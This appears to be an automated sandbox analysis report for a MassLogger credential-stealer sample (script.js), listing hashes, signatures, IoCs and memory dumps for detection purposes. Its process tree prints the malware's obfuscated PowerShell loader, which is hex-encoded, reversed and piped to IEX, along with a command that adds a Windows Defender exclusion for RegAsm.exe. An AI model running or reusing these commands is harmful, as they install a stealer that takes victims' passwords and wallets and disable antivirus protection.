masslogger | 9bd9d73577b5a9fe76184efcb1e84cbed087a7e5892a2a2b9fd0d5d1c54b33b1

General

Target

script.js
Size

2KB
MD5

e6a97d295d68915f0b716c6e7c6cf1b3
SHA1

2affefd7bbf4cf826568f22635a247ca62f27f30
SHA256

9bd9d73577b5a9fe76184efcb1e84cbed087a7e5892a2a2b9fd0d5d1c54b33b1
SHA512

2c6144389dbd6b7baac3edeebe47691ea7c4950bab42882b673662615fd04bff7bee1f7ae97573c9d7b12ccb70910ccd5832cab15a7523b92ea45bb811e902fb

Score

10^/10

masslogger spyware stealer

Malware Config

Signatures

MassLogger
Masslogger is a .NET stealer targeting passwords from browsers, email and cryptocurrency clients.
stealer spyware masslogger

MassLogger Main Payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/320-13-0x0000000000400000-0x0000000000486000-memory.dmp	family_masslogger
behavioral1/memory/320-14-0x000000000048164E-mapping.dmp	family_masslogger
behavioral1/memory/320-16-0x0000000000400000-0x0000000000486000-memory.dmp	family_masslogger
behavioral1/memory/320-15-0x0000000000400000-0x0000000000486000-memory.dmp	family_masslogger

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

7 1932 powershell.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

9 api.ipify.org
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1932 powershell.exe
1932 powershell.exe

flow	pid	process
7	1932	powershell.exe

flow	ioc
9	api.ipify.org

pid	process
1932	powershell.exe
1932	powershell.exe

Suspicious use of AdjustPrivilegeToken 41 IoCs

Processes:

powershell.exe

description	pid	process
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeIncreaseQuotaPrivilege	1932	powershell.exe
Token: SeSecurityPrivilege	1932	powershell.exe
Token: SeTakeOwnershipPrivilege	1932	powershell.exe
Token: SeLoadDriverPrivilege	1932	powershell.exe
Token: SeSystemProfilePrivilege	1932	powershell.exe
Token: SeSystemtimePrivilege	1932	powershell.exe
Token: SeProfSingleProcessPrivilege	1932	powershell.exe
Token: SeIncBasePriorityPrivilege	1932	powershell.exe
Token: SeCreatePagefilePrivilege	1932	powershell.exe
Token: SeBackupPrivilege	1932	powershell.exe
Token: SeRestorePrivilege	1932	powershell.exe
Token: SeShutdownPrivilege	1932	powershell.exe
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeSystemEnvironmentPrivilege	1932	powershell.exe
Token: SeRemoteShutdownPrivilege	1932	powershell.exe
Token: SeUndockPrivilege	1932	powershell.exe
Token: SeManageVolumePrivilege	1932	powershell.exe
Token: 33	1932	powershell.exe
Token: 34	1932	powershell.exe
Token: 35	1932	powershell.exe
Token: SeIncreaseQuotaPrivilege	1932	powershell.exe
Token: SeSecurityPrivilege	1932	powershell.exe
Token: SeTakeOwnershipPrivilege	1932	powershell.exe
Token: SeLoadDriverPrivilege	1932	powershell.exe
Token: SeSystemProfilePrivilege	1932	powershell.exe
Token: SeSystemtimePrivilege	1932	powershell.exe
Token: SeProfSingleProcessPrivilege	1932	powershell.exe
Token: SeIncBasePriorityPrivilege	1932	powershell.exe
Token: SeCreatePagefilePrivilege	1932	powershell.exe
Token: SeBackupPrivilege	1932	powershell.exe
Token: SeRestorePrivilege	1932	powershell.exe
Token: SeShutdownPrivilege	1932	powershell.exe
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeSystemEnvironmentPrivilege	1932	powershell.exe
Token: SeRemoteShutdownPrivilege	1932	powershell.exe
Token: SeUndockPrivilege	1932	powershell.exe
Token: SeManageVolumePrivilege	1932	powershell.exe
Token: 33	1932	powershell.exe
Token: 34	1932	powershell.exe
Token: 35	1932	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

wscript.exe

description	pid	process	target process
PID 1580 wrote to memory of 1932	1580	wscript.exe	powershell.exe
PID 1580 wrote to memory of 1932	1580	wscript.exe	powershell.exe
PID 1580 wrote to memory of 1932	1580	wscript.exe	powershell.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\script.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $srrYk='D4%C7%72%72%02%E6%96%F6%A6%D2%02%37%27%16%86%34%96%96%36%37%16%42%02%D3%76%E6%96%27%47%35%96%96%36%37%16%42%B3%D7%22%F5%42%87%03%22%D5%56%47%97%26%B5%D5%27%16%86%36%B5%B7%02%47%36%56%A6%26%F4%D2%86%36%16%54%27%F6%64%C7%02%92%72%E5%72%82%47%96%C6%07%37%E2%67%D6%42%02%D3%37%27%16%86%34%96%96%36%37%16%42%B3%92%72%76%07%A6%E2%47%37%F6%86%F2%F6%36%E2%C6%F6%36%47%56%E6%96%37%F2%F2%A3%07%47%47%86%72%C2%46%F6%86%47%56%D4%A3%A3%D5%56%07%97%45%C6%C6%16%34%E2%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%B5%C2%72%76%E6%96%27%47%72%02%B2%02%72%35%46%16%72%02%B2%02%72%F6%C6%E6%72%02%B2%02%72%77%F6%44%72%C2%97%47%47%42%82%56%D6%16%E6%97%24%C6%C6%16%34%A3%A3%D5%E6%F6%96%47%36%16%27%56%47%E6%94%E2%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%B5%02%D3%67%D6%42%B3%92%72%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%72%82%56%D6%16%E4%C6%16%96%47%27%16%05%86%47%96%75%46%16%F6%C4%A3%A3%D5%97%C6%26%D6%56%37%37%14%E2%E6%F6%96%47%36%56%C6%66%56%25%E2%D6%56%47%37%97%35%B5%02%D5%46%96%F6%67%B5%B3%D4%C7%72%92%47%E6%56%72%B2%72%96%C6%34%26%72%B2%72%56%75%E2%47%72%B2%72%56%E4%02%47%36%72%B2%72%56%A6%26%F4%72%B2%72%D2%77%56%E4%82%72%D3%97%47%47%42%B3%23%23%07%42%02%D3%02%C6%F6%36%F6%47%F6%27%05%97%47%96%27%57%36%56%35%A3%A3%D5%27%56%76%16%E6%16%D4%47%E6%96%F6%05%56%36%96%67%27%56%35%E2%47%56%E4%E2%D6%56%47%37%97%35%B5%B3%92%23%73%03%33%02%C2%D5%56%07%97%45%C6%F6%36%F6%47%F6%27%05%97%47%96%27%57%36%56%35%E2%47%56%E4%E2%D6%56%47%37%97%35%B5%82%47%36%56%A6%26%F4%F6%45%A3%A3%D5%D6%57%E6%54%B5%02%D3%02%23%23%07%42%B3%92%76%E6%96%07%42%82%02%C6%96%47%E6%57%02%D7%47%56%96%57%15%D2%02%13%02%47%E6%57%F6%36%D2%02%D6%F6%36%E2%56%C6%76%F6%F6%76%02%07%D6%F6%36%D2%02%E6%F6%96%47%36%56%E6%E6%F6%36%D2%47%37%56%47%02%D3%02%76%E6%96%07%42%B7%02%F6%46%B3%56%E6%F6%26%45%42%02%D4%02%C6%16%37%B3%92%72%94%72%C2%72%E3%72%82%56%36%16%C6%07%56%27%E2%72%85%54%E3%72%D3%56%E6%F6%26%45%42';$text =$srrYk.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('%') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''| & (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}))
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1932

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:320

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
4⤵
PID:1924

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
72a81584c6d3eafddfb853586071c343

SHA1
1828889b218cd120336ea8fedf0c98be83c08779

SHA256
772317d02b2c4e2f488d315c2e0f6966d6b6d3aa9854ce33e7ece198447eb9b0

SHA512
c50a95053f4c3e1ebc487c9568ac9886f99beb61630fe16ead8ca607b68b3e6fdf28917639014cc349c553b5348b13418610865d6a5b325273da4bd3f3c41537

Download Submit
memory/320-13-0x0000000000400000-0x0000000000486000-memory.dmp

Filesize
536KB

Download
memory/320-17-0x0000000073790000-0x0000000073E7E000-memory.dmp

Filesize
6.9MB

Download
memory/320-15-0x0000000000400000-0x0000000000486000-memory.dmp

Filesize
536KB

Download
memory/320-16-0x0000000000400000-0x0000000000486000-memory.dmp

Filesize
536KB

Download
memory/320-14-0x000000000048164E-mapping.dmp

Download
memory/1924-25-0x0000000005240000-0x0000000005241000-memory.dmp

Filesize
4KB

Download
memory/1924-23-0x0000000004770000-0x0000000004771000-memory.dmp

Filesize
4KB

Download
memory/1924-57-0x0000000006300000-0x0000000006301000-memory.dmp

Filesize
4KB

Download
memory/1924-58-0x0000000006310000-0x0000000006311000-memory.dmp

Filesize
4KB

Download
memory/1924-43-0x0000000005F80000-0x0000000005F81000-memory.dmp

Filesize
4KB

Download
memory/1924-42-0x0000000006280000-0x0000000006281000-memory.dmp

Filesize
4KB

Download
memory/1924-35-0x0000000006120000-0x0000000006121000-memory.dmp

Filesize
4KB

Download
memory/1924-34-0x00000000060C0000-0x00000000060C1000-memory.dmp

Filesize
4KB

Download
memory/1924-29-0x0000000005FC0000-0x0000000005FC1000-memory.dmp

Filesize
4KB

Download
memory/1924-24-0x00000000024D0000-0x00000000024D1000-memory.dmp

Filesize
4KB

Download
memory/1924-20-0x0000000000000000-mapping.dmp

Download
memory/1924-22-0x00000000021E0000-0x00000000021E1000-memory.dmp

Filesize
4KB

Download
memory/1924-21-0x0000000073790000-0x0000000073E7E000-memory.dmp

Filesize
6.9MB

Download
memory/1932-7-0x0000000002340000-0x0000000002341000-memory.dmp

Filesize
4KB

Download
memory/1932-4-0x0000000002300000-0x0000000002301000-memory.dmp

Filesize
4KB

Download
memory/1932-2-0x0000000000000000-mapping.dmp

Download
memory/1932-3-0x000007FEF5CF0000-0x000007FEF66DC000-memory.dmp

Filesize
9.9MB

Download
memory/1932-5-0x000000001AAE0000-0x000000001AAE1000-memory.dmp

Filesize
4KB

Download
memory/1932-6-0x00000000025F0000-0x00000000025F1000-memory.dmp

Filesize
4KB

Download
memory/1932-9-0x000000001C4A0000-0x000000001C4A1000-memory.dmp

Filesize
4KB

Download
memory/1932-8-0x000000001B6B0000-0x000000001B6B1000-memory.dmp

Filesize
4KB

Download
memory/1932-11-0x000000001C410000-0x000000001C418000-memory.dmp

Filesize
32KB

Download
memory/1932-12-0x000000001C420000-0x000000001C42D000-memory.dmp

Filesize
52KB

Download
memory/1932-10-0x000000001B510000-0x000000001B527000-memory.dmp

Filesize
92KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads